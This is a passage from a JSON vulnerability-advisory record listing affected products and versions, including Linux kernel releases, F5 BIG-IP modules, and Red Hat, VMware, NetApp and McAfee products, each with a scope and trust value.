        "vendor": "f5",
        "version": "11.5.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.17.10"
      },
      {
        "model": "big-ip asm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.5"
      },
      {
        "model": "big-ip ltm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.6.1"
      },
      {
        "model": "big-ip analytics hf3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.4"
      },
      {
        "model": "big-ip gtm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "14.0"
      },
      {
        "model": "enterprise linux for power little endian extended update supp",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "-7.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.1"
      },
      {
        "model": "big-ip edge gateway",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.6.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.11.1"
      },
      {
        "model": "big-ip gtm hf7",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.6"
      },
      {
        "model": "enterprise linux server tus",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "-7.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.23"
      },
      {
        "model": "big-ip analytics",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.2"
      },
      {
        "model": "big-ip afm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.13.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.64"
      },
      {
        "model": "big-ip dns",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.12.7"
      },
      {
        "model": "big-ip webaccelerator",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "15.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.93"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.15.7"
      },
      {
        "model": "big-ip ltm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.6"
      },
      {
        "model": "hci storage nodes",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "netapp",
        "version": "0"
      },
      {
        "model": "big-ip edge gateway",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "12.1.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.32.6"
      },
      {
        "model": "big-ip fps hf2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "12.1.1"
      },
      {
        "model": "big-ip pem",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.6.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.11.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.57"
      },
      {
        "model": "big-ip ltm hf2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "12.1.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.14.7"
      },
      {
        "model": "big-ip aam",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.4"
      },
      {
        "model": "big-ip apm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.6.1"
      },
      {
        "model": "big-ip aam hf3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.4"
      },
      {
        "model": "big-ip ltm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "12.1.1"
      },
      {
        "model": "big-ip apm hf2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "12.1.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.19"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.40"
      },
      {
        "model": "big-ip analytics",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "13.1.0.5"
      },
      {
        "model": "big-ip pem",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "12.1.2"
      },
      {
        "model": "codeready linux builder for power little endian",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "8"
      },
      {
        "model": "big-ip asm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "12.1.3.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.14.2"
      },
      {
        "model": "big-ip apm hf3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.6"
      },
      {
        "model": "data loss prevention prevent",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mcafee",
        "version": "-11.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.56"
      },
      {
        "model": "advanced threat defense",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mcafee",
        "version": "4.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.25"
      },
      {
        "model": "enterprise linux for arm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "648"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.32.5"
      },
      {
        "model": "enterprise linux server update services for sap solutions",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "-7.6"
      },
      {
        "model": "big-ip link controller",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "12.1.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.13"
      },
      {
        "model": "big-ip afm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "12.1.3.7"
      },
      {
        "model": "big-ip aam",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.6.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.18"
      },
      {
        "model": "sd-wan gateway by velocloud",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "0"
      },
      {
        "model": "big-ip fps",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "12.1.3"
      },
      {
        "model": "enterprise linux server tus",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "-7.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.12.44"
      },
      {
        "model": "vcloud director for service providers",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.19.3"
      },
      {
        "model": "big-ip analytics hf1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.4"
      },
      {
        "model": "big-ip link controller",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "14.1"
      },
      {
        "model": "big-ip webaccelerator",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "12.1.3.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.32.1"
      },
      {
        "model": "big-ip aam hf2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.73"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.0.65"
      },
      {
        "model": "big-ip asm hf1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "12.1.2"
      },
      {
        "model": "big-ip apm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "12.1.1"
      },
      {
        "model": "big-ip analytics",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.6.0"
      },
      {
        "model": "enterprise linux server aus",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "-7.6"
      },
      {
        "model": "storagegrid webscale nas bridge",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "netapp",
        "version": "0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.22"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.3113"
      },
      {
        "model": "big-ip gtm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "14.0.0.3"
      },
      {
        "model": "big-ip edge gateway",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "13.1.1"
      },
      {
        "model": "big-ip ltm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.6.4"
      },
      {
        "model": "big-ip analytics",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "12.1.3"
      },
      {
        "model": "enterprise linux for ibm z systems extended update support",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "-7.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.11.3"
      },
      {
        "model": "big-ip link controller",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "14.0"
      },
      {
        "model": "big-ip webaccelerator",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4"
      },
      {
        "model": "big-ip dns",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "13.1.0.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.20.14"
      },
      {
        "model": "big-ip analytics hf1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.6.2"
      },
      {
        "model": "big-ip asm build",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.66.204.442"
      },
      {
        "model": "big-ip fps",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "14.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.15.4"
      },
      {
        "model": "big-ip pem",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "12.1.3.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.17.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.10"
      },
      {
        "model": "big-ip pem",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "13.1.1"
      },
      {
        "model": "big-ip link controller hf2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "12.1"
      },
      {
        "model": "big-ip gtm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.9"
      },
      {
        "model": "nsx for vsphere",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "0"
      },
      {
        "model": "big-ip fps",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "13.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.21.2"
      },
      {
        "model": "big-ip analytics",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "14.0"
      },
      {
        "model": "big-ip analytics hf2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.6.1"
      },
      {
        "model": "big-ip link controller hf8",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.6"
      },
      {
        "model": "big-ip pem",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "12.1.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.14.1"
      },
      {
        "model": "big-ip webaccelerator",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "13.1.0.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.81"
      },
      {
        "model": "openshift container platform",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "4.1"
      },
      {
        "model": "big-ip afm build",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.40.1.256"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.72"
      },
      {
        "model": "enterprise linux server update services for sap solutions",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "-7.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.14"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.16"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.18.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.18.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.18.3"
      },
      {
        "model": "big-ip analytics",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "13.1.0.4"
      },
      {
        "model": "big-ip analytics",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "13.1"
      },
      {
        "model": "big-ip pem",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "13.1.0.8"
      },
      {
        "model": "big-ip gtm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.16"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.12.6"
      },
      {
        "model": "big-ip asm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "12.1.3"
      },
      {
        "model": "big-ip apm hf1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.2"
      },
      {
        "model": "big-ip dns",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.6"
      },
      {
        "model": "big-ip aam",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "13.1.0.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.28.8"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.13.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.28"
      },
      {
        "model": "enterprise linux server aus",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "-7.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.52"
      },
      {
        "model": "big-ip gtm build",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.40.1.256"
      },
      {
        "model": "big-ip asm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "14.1"
      },
      {
        "model": "enterprise linux server update services for sap solutions",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "-7.2"
      },
      {
        "model": "data loss prevention prevent",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mcafee",
        "version": "-10.0"
      },
      {
        "model": "big-ip pem hf2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "12.1.2"
      },
      {
        "model": "web gateway",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mcafee",
        "version": "8.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.19.2"
      },
      {
        "model": "big-ip ltm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.6.3"
      },
      {
        "model": "big-ip analytics hf2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "12.1.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.13.3"
      },
      {
        "model": "big-ip afm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "14.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.16.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.17.11"
      },
      {
        "model": "threat intelligence exchange server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mcafee",
        "version": "2.1"
      },
      {
        "model": "network data loss prevention",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mcafee",
        "version": "9.3"
      },
      {
        "model": "big-ip webaccelerator",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "12.1.3"
      },
      {
        "model": "openshift dedicated",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.7.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.60"
      },
      {
        "model": "big-ip asm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "14.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.2"
      },
      {
        "model": "big-ip link controller",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "14.0.0.3"
      },
      {
        "model": "big-ip asm hf7",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.19.3"
      },
      {
        "model": "big-ip apm build",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.66.204.442"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.11"
      },
      {
        "model": "big-ip pem hf5",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.6.0"
      },
      {
        "model": "big-ip fps",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "14.0.0.3"
      },
      {
        "model": "big-ip link controller",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.6"
      },
      {
        "model": "big-ip ltm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "12.1.2"
      },
      {
        "model": "big-ip gtm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.6.1"
      },
      {
        "model": "big-ip aam hf2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.6.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.49"
      },
      {
        "model": "big-ip pem hf",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "12.1.21"
      },
      {
        "model": "big-ip fps",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.8.1"
      },
      {
        "model": "big-ip dns",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "12.1.0"
      },
      {
        "model": "big-ip analytics",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.10.37"
      },
      {
        "model": "big-ip webaccelerator",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "14.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.29"
      },
      {
        "model": "nsx-t data center",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.11.6"
      },
      {
        "model": "big-ip link controller",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.9"
      },
      {
        "model": "vrealize automation",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.22.17"
      },
      {
        "model": "big-ip link controller hf1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.6.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.28.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.44"
      },
      {
        "model": "enterprise linux server aus",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "-7.3"
      },
      {
        "model": "big-ip dns",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.6.4"
      },
      {
        "model": "big-ip edge gateway",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "14.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.28.1"
      },
      {
        "model": "big-ip webaccelerator",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "13.1.0.4"
      },
      {
        "model": "big-ip webaccelerator",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "13.1"
      },
      {
        "model": "storagegrid",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "netapp",
        "version": "0"
      },
      {
        "model": "big-ip apm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "15.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.1"
      },
      {
        "model": "big-ip gtm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "12.1.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.0.69"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.25.9"
      },
      {
        "model": "virtualization host extended update support",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "-4.2"
      },
      {
        "model": "big-ip link controller",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.7"
      },
      {
        "model": "big-ip aam hf2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "12.1.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.8.9"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.26"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.20.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.10.36"
      },
      {
        "model": "big-ip fps",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.21"
      },
      {
        "model": "big-ip gtm hf1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.6.2"
      },
      {
        "model": "big-ip ltm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "12.1.3.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.315"
      },
      {
        "model": "big-ip link controller hf1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "12.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.30.4"
      },
      {
        "model": "big-ip pem",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "12.1.3.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.20"
      },
      {
        "model": "big-ip aam",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "12.1.0"
      },
      {
        "model": "big-ip afm hf1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.12"
      },
      {
        "model": "big-ip apm hf8",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.6"
      },
      {
        "model": "unified access gateway",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.43"
      },
      {
        "model": "big-ip ltm hf2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.4"
      },
      {
        "model": "big-ip asm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "14.0.0.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.1"
      },
      {
        "model": "big-ip aam build",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.40.1.256"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.36"
      },
      {
        "model": "big-ip ltm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "12.1.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.12.16"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.32.16"
      },
      {
        "model": "big-ip afm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "14.0.0.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.13.1"
      },
      {
        "model": "big-ip analytics",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "13.1.0.6"
      },
      {
        "model": "big-ip apm hf2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.25.8"
      },
      {
        "model": "big-ip apm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "12.1.3.6"
      },
      {
        "model": "big-ip link controller",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.6.1"
      },
      {
        "model": "big-ip pem",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.4"
      },
      {
        "model": "enterprise linux workstation",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.18.2"
      },
      {
        "model": "big-ip edge gateway",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.6.2"
      },
      {
        "model": "big-ip fps",
        "scope": "eq",
        "trust": 0.3,
